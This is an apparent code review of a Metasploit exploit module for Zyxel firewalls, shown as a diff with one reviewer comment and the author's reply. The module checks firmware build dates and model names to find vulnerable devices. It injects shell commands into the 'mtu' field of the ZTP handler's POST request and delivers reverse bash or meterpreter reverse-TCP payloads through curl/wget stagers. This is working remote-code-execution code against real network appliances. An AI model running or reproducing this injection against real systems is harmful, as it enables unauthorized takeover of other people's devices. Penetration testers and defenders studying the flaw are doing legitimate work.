modules/exploits/linux/http/zyxel_ztp_rce.rb

```diff
@@ -0,0 +1,157 @@
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Shell Dropper',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_MIPS64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'curl', 'wget' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  # Checks the build date that is embedded in the landing page. If it finds a build
+  # date older than April 20, 2022 then it will additionally check if the model is
+  # a USG FLEX, USG20[w]?-VPN, or an ATP system. Command execution is blind so this
+  # seems like a reasonable approach.
+  def check
+    res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/'))
+    unless res
+      return CheckCode::Unknown('The target failed to respond to check.')
+    end
+
+    unless res.code == 200
+      return CheckCode::Safe('Failed to retrieve /')
+    end
+
+    ver = res.body[/favicon\.ico\?v=(?<build_date>[0-9]{6,})/, :build_date]
+    if ver.nil?
+      return CheckCode::Safe('Could not extract a version number')
+    end
+
+    if ver[0..5].to_i < 220420
+      model = res.get_html_document.xpath('//title').text
+      if model.include?('USG FLEX') || model.include?('ATP') || (model.include?('USG20') && model.include?('-VPN'))
+        return CheckCode::Appears("This was determined by the model and build date: #{model}, #{ver}")
+      end
+    end
+
+    CheckCode::Safe("This determination is based on the build date string: #{ver}.")
+  end
+
+  def execute_command(cmd, _opts = {})
+    handler_uri = normalize_uri(target_uri.path, '/ztp/cgi-bin/handler')
+    print_status("Sending command to #{handler_uri}")
+
+    # this is the POST data. exploit goes into the mtu field. technically, `data` is a usable vector too
+    # but it's more involved.
+    http_payload = {
+      'command' => 'setWanPortSt',
+      'proto' => 'dhcp',
+      'port' => Rex::Text.rand_text_numeric(4).to_s,
+      'vlan_tagged' => Rex::Text.rand_text_numeric(4).to_s,
+      'vlanid' => Rex::Text.rand_text_numeric(4).to_s,
+      'mtu' => ";#{cmd};",
+      'data' => ''
```

Comment:
Just checking but does this still need to be sent it if it is empty?

Reply:
Correct. It's required and can be empty. In some code paths it can contain an extra json blob, but we aren't traversing those paths so :shrug: